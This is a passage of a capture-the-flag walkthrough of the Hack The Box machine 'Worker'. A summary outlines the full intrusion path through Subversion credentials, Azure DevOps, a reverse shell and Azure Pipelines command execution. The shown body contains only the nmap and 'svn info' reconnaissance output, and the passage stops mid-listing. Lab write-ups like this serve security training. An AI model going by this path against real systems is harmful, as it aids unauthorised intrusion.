Jump Ahead: Enum – Initial Foothold – User – Root – Resources
TL;DR;
To solve this machine, we begin by enumerating open services – finding ports 80, 3690, and 5985 open. Checking out port 3690 we learn it is a subversion server. While enumerating it, we find a set of credentials as well as several subdomains. One subdomain we eventually learn of is http://devops.worker.htb, which after using the credentials we found to login, we are presented with Azure Devops. Through this, we are able to upload and execute a reverse shell on one of the previous subdomain we found. While enumerating the remote machine, we find another set of credentials, which we use to remotely connect as the robisl user – and gain user.txt. Using robisl‘s credentials to log into devops, we are able to exploit Azure Pipelines to execute system commands – gaining root.txt.
Enumeration
To solve this machine, we begin by enumerating open services – finding ports 80, 3690, and 5985 open.
$ sudo nmap -v -p- --min-rate 3000 $RHOST
[...]
$ sudo nmap -A -oA scans/nmap/tcp-scripts -p 80,3690,5985 $RHOST
# Nmap 7.80 scan initiated Sun Aug 16 09:46:00 2020 as: nmap -A -oA scans/nmap/tcp-scripts -p 80,3690,5985 10.10.10.203
Nmap scan report for 10.10.10.203
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 114.78 ms 10.10.14.1
2 114.74 ms 10.10.10.203
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 16 09:46:15 2020 -- 1 IP address (1 host up) scanned in 14.73 seconds
To bruteforce files and directories on the webserver at port 80, we use gobuster, however, we do not get valuable results. Port 5985 is typically associated with WinRM, which we would need credentials to authenticate with, so we can’t do much with it right now. Port 3690 is something we have not seen before, so we do some researching and learn it is associated with subversion – the precursor to git. To enumerate the subversion server, we use the svn info command.
$ svn info -R svn://$RHOST | tee downloads/svn/info.txt
Path: .
URL: svn://10.10.10.203
Relative URL: ^/
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb
URL: svn://10.10.10.203/dimension.worker.htb
Relative URL: ^/dimension.worker.htb
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/index.html
Name: index.html
URL: svn://10.10.10.203/dimension.worker.htb/index.html
Relative URL: ^/dimension.worker.htb/index.html
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 14588
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets
URL: svn://10.10.10.203/dimension.worker.htb/assets
Relative URL: ^/dimension.worker.htb/assets
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts
Relative URL: ^/dimension.worker.htb/assets/webfonts
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
Name: fa-solid-900.woff2
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 75440
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-brands-400.svg
Name: fa-brands-400.svg
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-brands-400.svg
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-brands-400.svg
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 693364
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
Name: fa-brands-400.ttf
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 129048
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
Name: fa-regular-400.ttf
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 34092
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-regular-400.woff
Name: fa-regular-400.woff
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-regular-400.woff
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-regular-400.woff
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 16804
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-regular-400.svg
Name: fa-regular-400.svg
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-regular-400.svg
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-regular-400.svg
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 145254
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-brands-400.eot
Name: fa-brands-400.eot
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-brands-400.eot
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-brands-400.eot
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 129352
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-brands-400.woff
Name: fa-brands-400.woff
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-brands-400.woff
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-brands-400.woff
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 87352
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-solid-900.eot
Name: fa-solid-900.eot
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-solid-900.eot
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-solid-900.eot
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 192116
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
Name: fa-brands-400.woff2
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 74508
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
Name: fa-regular-400.woff2
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 13580
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-regular-400.eot
Name: fa-regular-400.eot
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-regular-400.eot
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-regular-400.eot
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 34388
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
Name: fa-solid-900.ttf
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 191832
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-solid-900.svg
Name: fa-solid-900.svg
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-solid-900.svg
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-solid-900.svg
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 844037
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/webfonts/fa-solid-900.woff
Name: fa-solid-900.woff
URL: svn://10.10.10.203/dimension.worker.htb/assets/webfonts/fa-solid-900.woff
Relative URL: ^/dimension.worker.htb/assets/webfonts/fa-solid-900.woff
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 98020
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/css
URL: svn://10.10.10.203/dimension.worker.htb/assets/css
Relative URL: ^/dimension.worker.htb/assets/css
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/css/fontawesome-all.min.css
Name: fontawesome-all.min.css
URL: svn://10.10.10.203/dimension.worker.htb/assets/css/fontawesome-all.min.css
Relative URL: ^/dimension.worker.htb/assets/css/fontawesome-all.min.css
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 55971
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/css/main.css
Name: main.css
URL: svn://10.10.10.203/dimension.worker.htb/assets/css/main.css
Relative URL: ^/dimension.worker.htb/assets/css/main.css
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 34493
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/css/noscript.css
Name: noscript.css
URL: svn://10.10.10.203/dimension.worker.htb/assets/css/noscript.css
Relative URL: ^/dimension.worker.htb/assets/css/noscript.css
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 604
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass
Relative URL: ^/dimension.worker.htb/assets/sass
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components
Relative URL: ^/dimension.worker.htb/assets/sass/components
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_button.scss
Name: _button.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_button.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_button.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1851
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_actions.scss
Name: _actions.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_actions.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_actions.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1787
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_form.scss
Name: _form.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_form.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_form.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 5933
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_list.scss
Name: _list.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_list.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_list.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 908
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_box.scss
Name: _box.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_box.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_box.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 531
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_table.scss
Name: _table.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_table.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_table.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1399
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_image.scss
Name: _image.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_image.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_image.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1447
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_icon.scss
Name: _icon.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_icon.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_icon.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 482
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/components/_icons.scss
Name: _icons.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/components/_icons.scss
Relative URL: ^/dimension.worker.htb/assets/sass/components/_icons.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 740
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/layout
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/layout
Relative URL: ^/dimension.worker.htb/assets/sass/layout
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/layout/_header.scss
Name: _header.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/layout/_header.scss
Relative URL: ^/dimension.worker.htb/assets/sass/layout/_header.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 5146
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/layout/_main.scss
Name: _main.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/layout/_main.scss
Relative URL: ^/dimension.worker.htb/assets/sass/layout/_main.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 2631
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/layout/_wrapper.scss
Name: _wrapper.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/layout/_wrapper.scss
Relative URL: ^/dimension.worker.htb/assets/sass/layout/_wrapper.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 730
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/layout/_bg.scss
Name: _bg.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/layout/_bg.scss
Relative URL: ^/dimension.worker.htb/assets/sass/layout/_bg.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1616
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/layout/_footer.scss
Name: _footer.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/layout/_footer.scss
Relative URL: ^/dimension.worker.htb/assets/sass/layout/_footer.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 812
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/main.scss
Name: main.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/main.scss
Relative URL: ^/dimension.worker.htb/assets/sass/main.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1183
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/noscript.scss
Name: noscript.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/noscript.scss
Relative URL: ^/dimension.worker.htb/assets/sass/noscript.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 738
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/base
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/base
Relative URL: ^/dimension.worker.htb/assets/sass/base
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/base/_page.scss
Name: _page.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/base/_page.scss
Relative URL: ^/dimension.worker.htb/assets/sass/base/_page.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 879
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/base/_reset.scss
Name: _reset.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/base/_reset.scss
Relative URL: ^/dimension.worker.htb/assets/sass/base/_reset.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1569
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/base/_typography.scss
Name: _typography.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/base/_typography.scss
Relative URL: ^/dimension.worker.htb/assets/sass/base/_typography.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 3325
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/libs
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/libs
Relative URL: ^/dimension.worker.htb/assets/sass/libs
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/libs/_mixins.scss
Name: _mixins.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/libs/_mixins.scss
Relative URL: ^/dimension.worker.htb/assets/sass/libs/_mixins.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 2218
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/libs/_vars.scss
Name: _vars.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/libs/_vars.scss
Relative URL: ^/dimension.worker.htb/assets/sass/libs/_vars.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 867
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/libs/_breakpoints.scss
Name: _breakpoints.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/libs/_breakpoints.scss
Relative URL: ^/dimension.worker.htb/assets/sass/libs/_breakpoints.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 4799
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/libs/_vendor.scss
Name: _vendor.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/libs/_vendor.scss
Relative URL: ^/dimension.worker.htb/assets/sass/libs/_vendor.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 7730
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/sass/libs/_functions.scss
Name: _functions.scss
URL: svn://10.10.10.203/dimension.worker.htb/assets/sass/libs/_functions.scss
Relative URL: ^/dimension.worker.htb/assets/sass/libs/_functions.scss
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1957
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/js
URL: svn://10.10.10.203/dimension.worker.htb/assets/js
Relative URL: ^/dimension.worker.htb/assets/js
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/js/jquery.min.js
Name: jquery.min.js
URL: svn://10.10.10.203/dimension.worker.htb/assets/js/jquery.min.js
Relative URL: ^/dimension.worker.htb/assets/js/jquery.min.js
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
